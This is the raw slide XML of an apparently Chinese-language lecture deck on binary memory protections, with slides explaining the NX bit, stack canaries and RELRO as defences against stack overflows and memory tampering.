                </a:rPr>
                <a:t>0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Shape 1396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C1C40A-1462-498C-B4F7-11994D4C9AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Shape 1397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB428279-963A-4DC2-BA36-D7F3502EFF53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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26" name="Shape 1398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03347C8C-5395-4B60-B37B-F165EDB80289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="1831647"/>
            <a:ext cx="4415200" cy="652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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Writable, Readable, Non-Executable</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 1399">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733A2FD4-B60E-48CD-A9EA-2266621ACC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="4538313"/>
            <a:ext cx="4415200" cy="652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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Writable, Readable, Non-Executable</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 1400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC6F853-578C-4DBB-ADEC-721D31748E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="5479513"/>
            <a:ext cx="4415200" cy="652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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Readable, Executable, Not Writable </a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Shape 1401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2957E1-4DAF-4B6B-9355-4B7857D66881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607540" y="2150247"/>
            <a:ext cx="1373200" cy="7600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Shape 1402">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F7CCFB-2091-4329-825C-643B71B6B253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607640" y="5413280"/>
            <a:ext cx="1400000" cy="392400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 1403">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EA5155-F341-459A-ACE5-A6741C8B6640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631806" y="4684080"/>
            <a:ext cx="197200" cy="440000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50000"/>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32" name="Shape 1404">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90D4DCE-ABF9-44C9-856F-023949D87EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5607406" y="4864480"/>
            <a:ext cx="1024400" cy="39600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="矩形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C831CD26-2B74-4F61-A046-515D23B3B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817080" y="611898"/>
            <a:ext cx="7643439" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>The NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(the No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bits)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="矩形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2349D0-5403-4048-92AB-343AD10A9A91}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| The NX bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38024999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4D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011909" y="2062584"/>
            <a:ext cx="1540806" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64EB43F5-BF87-475E-BC0B-CEACC438595C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2647359"/>
            <a:ext cx="6476989" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的防护措施，编译时生效</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在刚进入函数时，在栈上放置一个标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，在函数返回时检测其是否被改变。以达到防护栈溢出的目的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字长，其位置不一定与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存储的位置相邻，具体得看程序的汇编操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{987AF0A0-4384-4846-B332-AB17C6C6AC5D}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1246292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4D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608162" y="2209961"/>
            <a:ext cx="6061275" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RELocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Read-Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F97E162-B4E9-4A13-B493-BAD369BE022B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700270" y="3146640"/>
            <a:ext cx="6791459" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的防护措施，编译时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>部分 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RELRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在程序装入后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将其中一些段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.dynamic)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>标记为只读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
